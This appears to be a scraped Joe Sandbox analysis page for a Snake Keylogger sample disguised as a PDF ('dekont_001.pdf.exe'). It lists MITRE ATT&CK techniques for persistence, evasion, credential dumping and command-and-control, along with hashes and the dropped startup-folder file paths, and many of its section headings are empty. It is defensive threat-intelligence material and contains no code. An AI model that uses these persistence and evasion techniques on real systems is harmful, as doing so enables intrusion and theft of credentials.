Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1080000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df8e5c5efa10ff3af601438f3a0cc1b5b8d74c7e6e505d9596442e7ccfb3166c
Instruction ID: e0b6279c36eb7fa25cc587ec17285a92cc23770708160bc7d71a004d45670a3e
Opcode Fuzzy Hash: df8e5c5efa10ff3af601438f3a0cc1b5b8d74c7e6e505d9596442e7ccfb3166c
Instruction Fuzzy Hash: E8D06774D4411D9BCB20EFA8EA442DCB7B0EB99310F0014E69849B3210DA305AA08F11

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dekont_001.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs

C:\Users\user\AppData\Roaming\RequiredContract.exe

C:\Users\user\AppData\Roaming\RequiredContract.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
dekont_001.pdf.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre